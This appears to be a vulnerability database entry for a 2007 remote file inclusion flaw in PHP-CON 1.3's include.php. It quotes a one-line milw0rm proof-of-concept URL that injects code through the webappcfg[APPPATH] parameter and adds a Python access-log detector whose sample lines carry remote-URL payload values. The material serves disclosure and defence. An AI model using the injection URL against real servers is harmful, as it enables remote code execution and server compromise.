Vendor: PHP-CON
By: milw0rm
CVSS: 9.8 (CRITICAL)
CWE: Remote File Inclusion
Product Name: PHP-CON
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP-CON 1.3 – ‘include.php’ Remote File Inclusion

PHP-CON 1.3 is vulnerable to remote file inclusion. By manipulating the 'webappcfg[APPPATH]' parameter in a request to 'include.php', an attacker can execute arbitrary code on the server. This can lead to unauthorized access, data leakage, and potential server compromise.

Mitigation:

To mitigate this vulnerability, update to a patched version of PHP-CON if one is available (this entry lists no patch), or apply security measures such as input validation and proper file inclusion techniques.

Exploit-DB raw data:

PHP-CON 1.3 - 'include.php' Remote File Inclusion

Script : http://sourceforge.net/project/showfiles.php?group_id=182182

POC :

/PHP_CON/Exchange/include.php?webappcfg[APPPATH]= Evil Code

# milw0rm.com [2007-11-28]
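
The following Python detection is an added example, not part of the original advisory or of PHP-CON: it scans web-server access-log lines for requests to include.php that supply webappcfg[APPPATH], marking URL or stream-wrapper values as "remote" and any other client-supplied value as "override". The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "webappcfg[APPPATH]"            # parameter named in the advisory
SCRIPT = "/include.php"                 # script named in the advisory
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# URL scheme or PHP stream wrapper (two or more chars, so "C:\" is not matched),
# scheme-relative "//host", or UNC "\\host".
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)

def classify(line):
    """Return None, "override" (client-supplied path) or "remote" (URL/wrapper)."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith(SCRIPT):
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so %5B / %5D forms match too.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name != PARAM:
            continue
        if REMOTE.match(value):
            return "remote"
        verdict = "override"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every log line that needs review."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample access-log lines (not taken from any real server).
SAMPLE = [
    '203.0.113.7 - - [28/Nov/2007:10:01:02 +0000] "GET /PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://example.invalid/x.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [28/Nov/2007:10:01:05 +0000] "GET /PHP_CON/Exchange/include.php?webappcfg%5BAPPPATH%5D=ftp%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 512',
    '198.51.100.4 - - [28/Nov/2007:10:02:11 +0000] "GET /PHP_CON/Exchange/include.php?webappcfg[APPPATH]=/tmp/ HTTP/1.1" 200 90',
    '198.51.100.9 - - [28/Nov/2007:10:03:40 +0000] "GET /PHP_CON/Exchange/include.php HTTP/1.1" 200 1340',
    '198.51.100.9 - - [28/Nov/2007:10:03:41 +0000] "GET /index.php?page=home HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE):
        print(n, verdict)
```

An "override" hit still deserves review, since the application path is server configuration and a client has no reason to supply it.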